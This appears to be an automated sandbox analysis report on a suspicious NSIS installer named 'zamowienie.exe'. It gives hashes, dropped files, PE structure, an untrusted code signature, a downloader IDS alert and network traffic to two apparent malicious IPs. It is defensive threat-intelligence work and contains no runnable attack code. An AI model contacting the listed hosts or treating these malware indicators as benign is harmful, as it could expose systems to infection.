                                                                                                                                            SSDEEP:12:P0tAqgrQB0a8RjGdf3R+XsUaN+eZv2pIpui2eT:89aZLSJ348UaNdbR
                                                                                                                                            MD5:0C29FCC20D20A40DA37D6E0CB1BA826C
                                                                                                                                            SHA1:5B115AA28E37EFAE0C784E1F6CDEC0F6A34618CF
                                                                                                                                            SHA-256:7B312B99789E4E4CF69BE94036E1CF627EAF0991EDC1185CEC3FCEABF2E1474B
                                                                                                                                            SHA-512:1A4758AF55713379A5DBFA8693660D5D7CEAC8E4416B3208944A97388E94B10A8618491CDD0924963E7D881231C8791991A9CAA18EF7C83B5D921768F243527C
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:bipperen predating shambala brsteormens folkemordene trklosettets signerede soljers paralleller forerequest..folioark identifikationen skarv stoejdelen,barbzwr diagonalt driftsaaret oboistens auraer misstemningers vrangforestillingernes oceanet afmeldelsen acceding ercoli tenontomyotomy..pitons homeostases sanseredskabernes supercedes monoureide kvrkes,inc garderobeskabes abutments,skabelserne enamorato polyrhythmical,

                                                                                                                                            C:\Windows\Resources\synderegistres.lnk

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\zamowienie.exe
                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):824
                                                                                                                                            Entropy (8bit):3.298645295770995
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:8wl0nsXU19zK99k9eQ14kWRGiD1kA/rNJkKAh4t2YZ/elFlSJm:8YgK99k9/KRGiDR5HALqy
                                                                                                                                            MD5:3F22A092A9ADA770A8226DAFFDA1769B
                                                                                                                                            SHA1:922676C96C7E18B3F4E4D6B95E38058E61C777CD
                                                                                                                                            SHA-256:661DE0E6C3CE5446A1E5B8DF8FFFDB2D2D772A59D71708AE882235DEE8995FA2
                                                                                                                                            SHA-512:F76BF1B014FCC8BDA8976BD676B465F27F1D80FAE2979FC2470FF64AA6F77CEBC650582E85EF8F2F951EFBBCFB406D9FF62F042013C6B12C78EBDC2724EE536C
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:L..................F........................................................E....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>............................................a.l.f.o.n.s.....r.2...........salrernes.Unl229..R............................................s.a.l.r.e.r.n.e.s...U.n.l.2.2.9... ...#.....\.....\.U.s.e.r.s.\.a.l.f.o.n.s.\.s.a.l.r.e.r.n.e.s...U.n.l.2.2.9.I.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.r.e.a.l.m.l.e.s.s.\.h.o.v.e.d.v.a.g.t.s.\.c.h.a.p.e.r.o.n.e.n.\.U.n.r.i.s.i.n.g.2.1.8.........(.................l^".`G...3..qs................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.3.................

                                                                                                                                            Static File Info

                                                                                                                                            General

                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                            Entropy (8bit):7.952609681309242
                                                                                                                                            TrID:
                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                            File name:zamowienie.exe
                                                                                                                                            File size:775'216 bytes
                                                                                                                                            MD5:48f82f781035def809b0cdb2f66097a9
                                                                                                                                            SHA1:4a4ddf2315449dfcad4682fe6860e617b94e60b1
                                                                                                                                            SHA256:50f7a5ef12735cba58b3990988df8384294b42863033acc3d1bd939c3d00bdc5
                                                                                                                                            SHA512:a084fb2d21b095fbc7e919c47c27173c6f1eb6cdd6e79508cacb8660167d1b2d96d0df7eb42626f8b3c201a8a0110e7a61e4050c0b17c39226b525a9453dcecd
                                                                                                                                            SSDEEP:12288:huOjVDNtkrL1G7jcqcGSEpg8PwEHeubieXThqj+2t5MZzWBcrek/P/6g9d9oucMQ:DxDTkd9qcepnLHeotqy2nMZzwGF/hd9o
                                                                                                                                            TLSH:9CF4235646B1ECBFDC254EB1E85509F2B37AAE01C8622F9F3B513E517D3100A9C2B297
                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.w.F.*.....F...v...F...@...F.Rich..F.........PE..L....C.f.................d...........4............@

                                                                                                                                            File Icon

                                                                                                                                            Icon Hash:1363513931716d11

                                                                                                                                            Static PE Info

                                                                                                                                            General

                                                                                                                                            Entrypoint:0x4034f1
                                                                                                                                            Entrypoint Section:.text
                                                                                                                                            Digitally signed:true
                                                                                                                                            Imagebase:0x400000
                                                                                                                                            Subsystem:windows gui
                                                                                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                            Time Stamp:0x660843F5 [Sat Mar 30 16:55:17 2024 UTC]
                                                                                                                                            TLS Callbacks:
                                                                                                                                            CLR (.Net) Version:
                                                                                                                                            OS Version Major:4
                                                                                                                                            OS Version Minor:0
                                                                                                                                            File Version Major:4
                                                                                                                                            File Version Minor:0
                                                                                                                                            Subsystem Version Major:4
                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                            Import Hash:0293eec0b5432ad092f24065016203b2

                                                                                                                                            Authenticode Signature

                                                                                                                                            Signature Valid:false
                                                                                                                                            Signature Issuer:CN=Asketr, O=Asketr, L=Thuy, C=FR
                                                                                                                                            Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                                                            Error Number:-2146762487
                                                                                                                                            Not Before, Not After
                                                                                                                                            • 07/07/2024 08:15:25 07/07/2027 08:15:25
                                                                                                                                            Subject Chain
                                                                                                                                            • CN=Asketr, O=Asketr, L=Thuy, C=FR
                                                                                                                                            Version:3
                                                                                                                                            Thumbprint MD5:7EFD3ECB897E2ABECE07C7AC593B6430
                                                                                                                                            Thumbprint SHA-1:5B237C489CF2690FDD6A54BA1FC9A26943EC328B
                                                                                                                                            Thumbprint SHA-256:86393C8AF42EC06CBABEFFCB898F002E13075B185BC69AE87F69C2D0639676E6
                                                                                                                                            Serial:27380871A98FC2A9D010B5F5E699C9926A436723

                                                                                                                                            Entrypoint Preview

                                                                                                                                            Instruction
                                                                                                                                            push ebp
                                                                                                                                            mov ebp, esp
                                                                                                                                            sub esp, 00000224h
                                                                                                                                            push esi
                                                                                                                                            push edi
                                                                                                                                            xor edi, edi
                                                                                                                                            push 00008001h
                                                                                                                                            mov dword ptr [ebp-14h], edi
                                                                                                                                            mov dword ptr [ebp-0Ch], 0040A130h
                                                                                                                                            mov dword ptr [ebp-08h], edi
                                                                                                                                            mov byte ptr [ebp-04h], 00000020h
                                                                                                                                            call dword ptr [00408094h]
                                                                                                                                            mov esi, dword ptr [00408098h]
                                                                                                                                            lea eax, dword ptr [ebp-000000C4h]
                                                                                                                                            push eax
                                                                                                                                            mov dword ptr [ebp-000000B0h], edi
                                                                                                                                            mov dword ptr [ebp-30h], edi
                                                                                                                                            mov dword ptr [ebp-2Ch], edi
                                                                                                                                            mov dword ptr [ebp-000000C4h], 0000009Ch
                                                                                                                                            call esi
                                                                                                                                            test eax, eax
                                                                                                                                            jne 00007F7A411FDCB1h
                                                                                                                                            lea eax, dword ptr [ebp-000000C4h]
                                                                                                                                            mov dword ptr [ebp-000000C4h], 00000094h
                                                                                                                                            push eax
                                                                                                                                            call esi
                                                                                                                                            cmp dword ptr [ebp-000000B4h], 02h
                                                                                                                                            jne 00007F7A411FDC9Ch
                                                                                                                                            movsx cx, byte ptr [ebp-000000A3h]
                                                                                                                                            mov al, byte ptr [ebp-000000B0h]
                                                                                                                                            sub ecx, 30h
                                                                                                                                            sub al, 53h
                                                                                                                                            mov byte ptr [ebp-2Ah], 00000004h
                                                                                                                                            neg al
                                                                                                                                            sbb eax, eax
                                                                                                                                            not eax
                                                                                                                                            and eax, ecx
                                                                                                                                            mov word ptr [ebp-30h], ax
                                                                                                                                            cmp dword ptr [ebp-000000B4h], 02h
                                                                                                                                            jnc 00007F7A411FDC94h
                                                                                                                                            and byte ptr [ebp-2Ah], 00000000h
                                                                                                                                            cmp byte ptr [ebp-000000AFh], 00000041h
                                                                                                                                            jl 00007F7A411FDC83h
                                                                                                                                            movsx ax, byte ptr [ebp-000000AFh]
                                                                                                                                            sub eax, 40h
                                                                                                                                            mov word ptr [ebp-30h], ax
                                                                                                                                            jmp 00007F7A411FDC76h
                                                                                                                                            mov word ptr [ebp-30h], di
                                                                                                                                            cmp dword ptr [ebp-000000C0h], 0Ah
                                                                                                                                            jnc 00007F7A411FDC7Ah
                                                                                                                                            and word ptr [ebp+00000000h], 0000h

                                                                                                                                            Rich Headers

                                                                                                                                            Programming Language:
                                                                                                                                            • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                                                            Data Directories

                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x84300xa0.rdata
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x440000x9248.rsrc
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0xbb1b00x2280
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x80000x294.rdata
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                            Sections

                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                            .text0x10000x63f10x64005d54def596b9971f96b3f992edc6841dFalse0.6694140625data6.447221756584503IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                            .rdata0x80000x12340x14003c475f0d07d8baa23af20787c8b2799bFalse0.4265625data5.027896508511247IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                            .data0xa0000x1a4580x600da42354b535260f16ded3e942182ee49False0.447265625data4.104708836261179IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                            .ndata0x250000x1f0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                            .rsrc0x440000x92480x9400c0efcca114a98028d7be948c6cec3c1aFalse0.5374524915540541data6.082470874944529IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                            Resources

                                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                            RT_BITMAP0x444c00x368Device independent bitmap graphic, 96 x 16 x 4, image size 768EnglishUnited States0.23623853211009174
                                                                                                                                            RT_ICON0x448280x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.3420124481327801
                                                                                                                                            RT_ICON0x46dd00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.44043151969981237
                                                                                                                                            RT_ICON0x47e780xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304EnglishUnited States0.5618336886993603
                                                                                                                                            RT_ICON0x48d200xd73PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9215800174266628
                                                                                                                                            RT_ICON0x49a980xa55PNG image data, 256 x 256, 8-bit colormap, non-interlacedEnglishUnited States0.9164461247637051
                                                                                                                                            RT_ICON0x4a4f00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024EnglishUnited States0.7256317689530686
                                                                                                                                            RT_ICON0x4ad980x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.501219512195122
                                                                                                                                            RT_ICON0x4b4000x568Device independent bitmap graphic, 16 x 32 x 8, image size 256EnglishUnited States0.7109826589595376
                                                                                                                                            RT_ICON0x4b9680x49cPNG image data, 256 x 256, 4-bit colormap, non-interlacedEnglishUnited States0.9779661016949153
                                                                                                                                            RT_ICON0x4be080x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.7358156028368794
                                                                                                                                            RT_ICON0x4c2700x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.6586021505376344
                                                                                                                                            RT_ICON0x4c5580x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.8614864864864865
                                                                                                                                            RT_DIALOG0x4c6800x144dataEnglishUnited States0.5216049382716049
                                                                                                                                            RT_DIALOG0x4c7c80x13cdataEnglishUnited States0.5506329113924051
                                                                                                                                            RT_DIALOG0x4c9080x100dataEnglishUnited States0.5234375
                                                                                                                                            RT_DIALOG0x4ca080x11cdataEnglishUnited States0.6056338028169014
                                                                                                                                            RT_DIALOG0x4cb280xc4dataEnglishUnited States0.5918367346938775
                                                                                                                                            RT_DIALOG0x4cbf00x60dataEnglishUnited States0.7291666666666666
                                                                                                                                            RT_GROUP_ICON0x4cc500xaedataEnglishUnited States0.6149425287356322
                                                                                                                                            RT_VERSION0x4cd000x204dataEnglishUnited States0.5290697674418605
                                                                                                                                            RT_MANIFEST0x4cf080x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795

                                                                                                                                            Imports

                                                                                                                                            DLLImport
                                                                                                                                            ADVAPI32.dllRegEnumValueA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, RegOpenKeyExA, RegCreateKeyExA
                                                                                                                                            SHELL32.dllSHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA, ShellExecuteExA
                                                                                                                                            ole32.dllOleUninitialize, OleInitialize, IIDFromString, CoCreateInstance, CoTaskMemFree
                                                                                                                                            COMCTL32.dllImageList_Destroy, ImageList_AddMasked, ImageList_Create
                                                                                                                                            USER32.dllSetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcA, GetMessagePos, CheckDlgButton, LoadCursorA, SetCursor, GetSysColor, SetWindowPos, GetWindowLongA, IsWindowEnabled, SetClassLongA, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetDlgItemTextA, DialogBoxParamA, CharNextA, ExitWindowsEx, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, MessageBoxIndirectA, CharPrevA, PeekMessageA, GetClassInfoA, DispatchMessageA, TrackPopupMenu
                                                                                                                                            GDI32.dllGetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor
                                                                                                                                            KERNEL32.dllCreateProcessA, RemoveDirectoryA, GetTempFileNameA, CreateDirectoryA, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceA, lstrcpynA, SetErrorMode, GetVersionExA, lstrlenA, GetCommandLineA, GetTempPathA, GetWindowsDirectoryA, SetEnvironmentVariableA, ExitProcess, WriteFile, GetCurrentProcess, ReadFile, GetModuleFileNameA, GetFileSize, CreateFileA, GetTickCount, Sleep, SetFileAttributesA, GetFileAttributesA, SetCurrentDirectoryA, MoveFileA, GetFullPathNameA, GetShortPathNameA, SearchPathA, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, GetModuleHandleA, LoadLibraryExA, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, MulDiv, lstrcpyA, MoveFileExA, lstrcatA, WideCharToMultiByte, GetSystemDirectoryA, GetProcAddress, GetExitCodeProcess, WaitForSingleObject, CopyFileA

                                                                                                                                            Possible Origin

                                                                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                                                                            EnglishUnited States

                                                                                                                                            Network Behavior

                                                                                                                                            Suricata IDS Alerts

                                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                            2024-10-22T13:26:47.176136+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.549876185.17.43.223443TCP

                                                                                                                                            Network Port Distribution

                                                                                                                                            TCP Packets

                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                            Oct 22, 2024 13:26:45.888526917 CEST49876443192.168.2.5185.17.43.223
                                                                                                                                            Oct 22, 2024 13:26:45.888564110 CEST44349876185.17.43.223192.168.2.5
                                                                                                                                            Oct 22, 2024 13:26:45.888638973 CEST49876443192.168.2.5185.17.43.223
                                                                                                                                            Oct 22, 2024 13:26:45.900013924 CEST49876443192.168.2.5185.17.43.223
                                                                                                                                            Oct 22, 2024 13:26:45.900034904 CEST44349876185.17.43.223192.168.2.5
                                                                                                                                            Oct 22, 2024 13:26:46.799138069 CEST44349876185.17.43.223192.168.2.5
                                                                                                                                            Oct 22, 2024 13:26:46.799238920 CEST49876443192.168.2.5185.17.43.223
                                                                                                                                            Oct 22, 2024 13:26:46.897999048 CEST49876443192.168.2.5185.17.43.223
                                                                                                                                            Oct 22, 2024 13:26:46.898046017 CEST44349876185.17.43.223192.168.2.5
                                                                                                                                            Oct 22, 2024 13:26:46.898328066 CEST44349876185.17.43.223192.168.2.5
                                                                                                                                            Oct 22, 2024 13:26:46.898375034 CEST49876443192.168.2.5185.17.43.223
                                                                                                                                            Oct 22, 2024 13:26:46.903981924 CEST49876443192.168.2.5185.17.43.223
                                                                                                                                            Oct 22, 2024 13:26:46.947321892 CEST44349876185.17.43.223192.168.2.5
                                                                                                                                            Oct 22, 2024 13:26:47.176172972 CEST44349876185.17.43.223192.168.2.5
                                                                                                                                            Oct 22, 2024 13:26:47.176199913 CEST44349876185.17.43.223192.168.2.5
                                                                                                                                            Oct 22, 2024 13:26:47.176260948 CEST49876443192.168.2.5185.17.43.223
                                                                                                                                            Oct 22, 2024 13:26:47.176332951 CEST44349876185.17.43.223192.168.2.5
                                                                                                                                            Oct 22, 2024 13:26:47.176369905 CEST49876443192.168.2.5185.17.43.223
                                                                                                                                            Oct 22, 2024 13:26:47.177453995 CEST49876443192.168.2.5185.17.43.223
                                                                                                                                            Oct 22, 2024 13:26:47.294763088 CEST44349876185.17.43.223192.168.2.5
                                                                                                                                            Oct 22, 2024 13:26:47.294847965 CEST49876443192.168.2.5185.17.43.223
                                                                                                                                            Oct 22, 2024 13:26:47.316150904 CEST44349876185.17.43.223192.168.2.5
                                                                                                                                            Oct 22, 2024 13:26:47.316227913 CEST49876443192.168.2.5185.17.43.223
                                                                                                                                            Oct 22, 2024 13:26:47.317015886 CEST44349876185.17.43.223192.168.2.5
                                                                                                                                            Oct 22, 2024 13:26:47.317214966 CEST49876443192.168.2.5185.17.43.223
                                                                                                                                            Oct 22, 2024 13:26:47.595478058 CEST44349876185.17.43.223192.168.2.5
                                                                                                                                            Oct 22, 2024 13:26:47.595491886 CEST44349876185.17.43.223192.168.2.5
                                                                                                                                            Oct 22, 2024 13:26:47.595606089 CEST49876443192.168.2.5185.17.43.223
                                                                                                                                            Oct 22, 2024 13:26:47.596915960 CEST44349876185.17.43.223192.168.2.5
                                                                                                                                            Oct 22, 2024 13:26:47.596972942 CEST49876443192.168.2.5185.17.43.223
                                                                                                                                            Oct 22, 2024 13:26:47.597584009 CEST44349876185.17.43.223192.168.2.5
                                                                                                                                            Oct 22, 2024 13:26:47.597642899 CEST49876443192.168.2.5185.17.43.223
                                                                                                                                            Oct 22, 2024 13:26:47.597856998 CEST44349876185.17.43.223192.168.2.5
                                                                                                                                            Oct 22, 2024 13:26:47.597913980 CEST49876443192.168.2.5185.17.43.223
                                                                                                                                            Oct 22, 2024 13:26:47.598160982 CEST44349876185.17.43.223192.168.2.5
                                                                                                                                            Oct 22, 2024 13:26:47.598217010 CEST49876443192.168.2.5185.17.43.223
                                                                                                                                            Oct 22, 2024 13:26:47.598480940 CEST44349876185.17.43.223192.168.2.5
                                                                                                                                            Oct 22, 2024 13:26:47.598611116 CEST49876443192.168.2.5185.17.43.223
                                                                                                                                            Oct 22, 2024 13:26:47.598753929 CEST44349876185.17.43.223192.168.2.5
                                                                                                                                            Oct 22, 2024 13:26:47.598809004 CEST49876443192.168.2.5185.17.43.223
                                                                                                                                            Oct 22, 2024 13:26:47.601370096 CEST44349876185.17.43.223192.168.2.5
                                                                                                                                            Oct 22, 2024 13:26:47.601424932 CEST49876443192.168.2.5185.17.43.223
                                                                                                                                            Oct 22, 2024 13:26:47.602092028 CEST44349876185.17.43.223192.168.2.5
                                                                                                                                            Oct 22, 2024 13:26:47.602145910 CEST49876443192.168.2.5185.17.43.223
                                                                                                                                            Oct 22, 2024 13:26:47.603024006 CEST44349876185.17.43.223192.168.2.5
                                                                                                                                            Oct 22, 2024 13:26:47.603079081 CEST49876443192.168.2.5185.17.43.223
                                                                                                                                            Oct 22, 2024 13:26:47.606815100 CEST44349876185.17.43.223192.168.2.5
                                                                                                                                            Oct 22, 2024 13:26:47.606867075 CEST49876443192.168.2.5185.17.43.223
                                                                                                                                            Oct 22, 2024 13:26:47.607677937 CEST44349876185.17.43.223192.168.2.5
                                                                                                                                            Oct 22, 2024 13:26:47.607733965 CEST49876443192.168.2.5185.17.43.223
                                                                                                                                            Oct 22, 2024 13:26:47.608589888 CEST44349876185.17.43.223192.168.2.5
                                                                                                                                            Oct 22, 2024 13:26:47.608643055 CEST49876443192.168.2.5185.17.43.223
                                                                                                                                            Oct 22, 2024 13:26:47.609061003 CEST44349876185.17.43.223192.168.2.5
                                                                                                                                            Oct 22, 2024 13:26:47.609117985 CEST49876443192.168.2.5185.17.43.223
                                                                                                                                            Oct 22, 2024 13:26:47.610675097 CEST44349876185.17.43.223192.168.2.5
                                                                                                                                            Oct 22, 2024 13:26:47.610728025 CEST49876443192.168.2.5185.17.43.223
                                                                                                                                            Oct 22, 2024 13:26:47.611660004 CEST44349876185.17.43.223192.168.2.5
                                                                                                                                            Oct 22, 2024 13:26:47.611715078 CEST49876443192.168.2.5185.17.43.223
                                                                                                                                            Oct 22, 2024 13:26:47.612519979 CEST44349876185.17.43.223192.168.2.5
                                                                                                                                            Oct 22, 2024 13:26:47.612572908 CEST49876443192.168.2.5185.17.43.223
                                                                                                                                            Oct 22, 2024 13:26:47.613466978 CEST44349876185.17.43.223192.168.2.5
                                                                                                                                            Oct 22, 2024 13:26:47.613523006 CEST49876443192.168.2.5185.17.43.223
                                                                                                                                            Oct 22, 2024 13:26:47.614439011 CEST44349876185.17.43.223192.168.2.5
                                                                                                                                            Oct 22, 2024 13:26:47.614491940 CEST49876443192.168.2.5185.17.43.223
                                                                                                                                            Oct 22, 2024 13:26:47.614970922 CEST44349876185.17.43.223192.168.2.5
                                                                                                                                            Oct 22, 2024 13:26:47.615024090 CEST49876443192.168.2.5185.17.43.223
                                                                                                                                            Oct 22, 2024 13:26:47.615809917 CEST44349876185.17.43.223192.168.2.5
                                                                                                                                            Oct 22, 2024 13:26:47.615864992 CEST49876443192.168.2.5185.17.43.223
                                                                                                                                            Oct 22, 2024 13:26:47.619081974 CEST44349876185.17.43.223192.168.2.5
                                                                                                                                            Oct 22, 2024 13:26:47.619138002 CEST49876443192.168.2.5185.17.43.223
                                                                                                                                            Oct 22, 2024 13:26:47.619384050 CEST44349876185.17.43.223192.168.2.5
                                                                                                                                            Oct 22, 2024 13:26:47.619446039 CEST49876443192.168.2.5185.17.43.223
                                                                                                                                            Oct 22, 2024 13:26:47.619890928 CEST44349876185.17.43.223192.168.2.5
                                                                                                                                            Oct 22, 2024 13:26:47.619947910 CEST49876443192.168.2.5185.17.43.223
                                                                                                                                            Oct 22, 2024 13:26:47.621699095 CEST44349876185.17.43.223192.168.2.5
                                                                                                                                            Oct 22, 2024 13:26:47.621754885 CEST49876443192.168.2.5185.17.43.223
                                                                                                                                            Oct 22, 2024 13:26:47.652319908 CEST44349876185.17.43.223192.168.2.5
                                                                                                                                            Oct 22, 2024 13:26:47.652378082 CEST49876443192.168.2.5185.17.43.223
                                                                                                                                            Oct 22, 2024 13:26:47.673635006 CEST44349876185.17.43.223192.168.2.5
                                                                                                                                            Oct 22, 2024 13:26:47.673691034 CEST49876443192.168.2.5185.17.43.223
                                                                                                                                            Oct 22, 2024 13:26:47.694073915 CEST44349876185.17.43.223192.168.2.5
                                                                                                                                            Oct 22, 2024 13:26:47.694142103 CEST49876443192.168.2.5185.17.43.223
                                                                                                                                            Oct 22, 2024 13:26:47.736130953 CEST44349876185.17.43.223192.168.2.5
                                                                                                                                            Oct 22, 2024 13:26:47.736217976 CEST49876443192.168.2.5185.17.43.223
                                                                                                                                            Oct 22, 2024 13:26:47.736646891 CEST44349876185.17.43.223192.168.2.5
                                                                                                                                            Oct 22, 2024 13:26:47.736711979 CEST49876443192.168.2.5185.17.43.223
                                                                                                                                            Oct 22, 2024 13:26:47.736973047 CEST44349876185.17.43.223192.168.2.5
                                                                                                                                            Oct 22, 2024 13:26:47.737034082 CEST49876443192.168.2.5185.17.43.223
                                                                                                                                            Oct 22, 2024 13:26:47.737278938 CEST44349876185.17.43.223192.168.2.5
                                                                                                                                            Oct 22, 2024 13:26:47.737332106 CEST49876443192.168.2.5185.17.43.223
                                                                                                                                            Oct 22, 2024 13:26:47.737348080 CEST44349876185.17.43.223192.168.2.5
                                                                                                                                            Oct 22, 2024 13:26:47.737373114 CEST44349876185.17.43.223192.168.2.5
                                                                                                                                            Oct 22, 2024 13:26:47.737396955 CEST49876443192.168.2.5185.17.43.223
                                                                                                                                            Oct 22, 2024 13:26:47.737426043 CEST49876443192.168.2.5185.17.43.223
                                                                                                                                            Oct 22, 2024 13:26:47.750183105 CEST49876443192.168.2.5185.17.43.223
                                                                                                                                            Oct 22, 2024 13:26:47.750202894 CEST44349876185.17.43.223192.168.2.5
                                                                                                                                            Oct 22, 2024 13:26:47.750214100 CEST49876443192.168.2.5185.17.43.223
                                                                                                                                            Oct 22, 2024 13:26:47.750258923 CEST49876443192.168.2.5185.17.43.223
                                                                                                                                            Oct 22, 2024 13:27:39.010672092 CEST4997780192.168.2.5194.58.112.174
                                                                                                                                            Oct 22, 2024 13:27:39.016484022 CEST8049977194.58.112.174192.168.2.5
                                                                                                                                            Oct 22, 2024 13:27:39.017102957 CEST4997780192.168.2.5194.58.112.174
                                                                                                                                            Oct 22, 2024 13:27:39.024836063 CEST4997780192.168.2.5194.58.112.174
                                                                                                                                            Oct 22, 2024 13:27:39.030426979 CEST8049977194.58.112.174192.168.2.5
                                                                                                                                            Oct 22, 2024 13:27:39.917622089 CEST8049977194.58.112.174192.168.2.5
                                                                                                                                            Oct 22, 2024 13:27:39.917649031 CEST8049977194.58.112.174192.168.2.5
                                                                                                                                            Oct 22, 2024 13:27:39.917661905 CEST8049977194.58.112.174192.168.2.5
                                                                                                                                            Oct 22, 2024 13:27:39.917671919 CEST8049977194.58.112.174192.168.2.5
                                                                                                                                            Oct 22, 2024 13:27:39.917684078 CEST8049977194.58.112.174192.168.2.5
                                                                                                                                            Oct 22, 2024 13:27:39.917694092 CEST8049977194.58.112.174192.168.2.5
                                                                                                                                            Oct 22, 2024 13:27:39.917711973 CEST8049977194.58.112.174192.168.2.5
                                                                                                                                            Oct 22, 2024 13:27:39.917723894 CEST8049977194.58.112.174192.168.2.5
                                                                                                                                            Oct 22, 2024 13:27:39.917732954 CEST8049977194.58.112.174192.168.2.5
                                                                                                                                            Oct 22, 2024 13:27:39.917745113 CEST8049977194.58.112.174192.168.2.5
